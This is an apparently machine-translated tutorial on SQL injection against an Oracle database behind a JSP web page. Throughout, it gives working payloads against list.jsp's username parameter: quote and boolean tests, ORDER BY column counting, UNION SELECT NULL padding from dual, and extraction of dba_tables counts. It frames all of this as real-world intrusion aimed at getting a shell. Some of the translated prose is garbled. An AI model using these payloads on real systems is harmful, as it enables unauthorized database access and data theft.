Oracle web Environment injection technology injection in the real world

The following article describes how to inject Oracle web Environment injection technology into the real world. If you want to know what injection is like in the real world, you must not miss the following articles. So let's try to get a shell from the injection point.

First, we find a page that may have an injection, list. jsp? Username = loveshell. An error occurs when we add a 'result. An Oracle background database is identified by an error. Oracle-xxxx contains Oracle, and then the statement is used:

 
 

  
  
list.jsp?username=loveshell' and ''||'1'='1  
 
 

Normal

 
 

  
  
list.jsp?username=loveshell' and ''||'2'='1  
 
 

Return null

 
 

  
  
list.jsp?username=loveshell'-- 
 
 

In this way, we can know that it is an Oracle character injection point, so we can use this method to insert our own SQL statement list. jsp? Username = loveshell 'and [Our SQL statement] --

At this time, we can consider the subsequent intrusion ideas based on our own goals. One is to develop towards the web and penetrate the web by querying the database information. The other is to directly intrude into the database, of course, Oracle and web are a perfect machine. Let's talk about how to query the information stored in the database! To obtain information, we need to feedback the information back. One is to use union queries. For example, our intrusion method is similar to the following:

 
 

  
  
list.jsp?username=loveshell' order by 10 
 
 

If the error message is reported, xx coloum does not exist. The number of fields is less than 10.

 
 

  
  
list.jsp?username=loveshell' order by 5 
 
 

Normally displayed, the number of fields is greater than 5

At last, an error occurs when order by 8 is found. order by 7 is normal, which indicates that there are 7 fields. Note: In general, the page logic is very simple, so order by can be used to guess. However, if this parameter enters more than two SQL statements, the number of fields in the result is different, it is difficult to use this method.

Of course, if more than two SQL statements are entered, it is estimated that the union query cannot be used because the number of fields before and after the SQL statement is different and the conditions cannot be met, next we will talk about a omnipotent way to obtain data. Here we will talk about a more intuitive union query.

 
 

  
  
list.jsp?username=loveshell' union select NULL,NULL,
NULL,NULL,NULL,NULL,NULL from dual 
 
 

If you use seven NULL values to match the corresponding fields, there will be no different field types. Unlike mysql, an existing table must be added to the select statement next to it. Here, dual is used.

The returned result is normal, and then we can continue. The fields used for information feedback need to meet the conditions in my above basic ideas.

 
 

  
  
list.jsp?username=loveshell' and 1=2 union select  
 
 

1, NULL, NULL from dual -- normal

 
 

  
  
list.jsp?username=loveshell' and 1=2
union select 1,2,NULL,NULL,NULL,NULL,NULL from dual 
 
 

Error. The second field is not numeric.

 
 

  
  
list.jsp?username=loveshell' and 1=
2 union select 1,'2',NULL,NULL,NULL,NULL,NULL from dual 
 
 

Error. The second field is not of the character type.

This is possible because fields include other types such as dates. This type is useless for our feedback, so NULL is skipped directly.

 
 

  
  
list.jsp?username=loveshell' and 1=2 union select 1,
NULL,'3',NULL,NULL,NULL,NULL from dual 
 
 

This is normal, and the corresponding position on the page is displayed. This field is exactly what we are looking. Sometimes, what if I want to see the number? For example, if you want to view the number of records, you can directly use the binary method, but it is more intuitive to directly display it. For example, you want to view the number of dba_tables records.

 
 

  
  
list.jsp?username=loveshell' and 1=2 union select 1,
to_char((select count(*) from dba_tables),'0000000'),
NULL,NULL,NULL,NULL,NULL from dual 
 
 

The above content introduces the injection technology of Oracle web environment in the real world.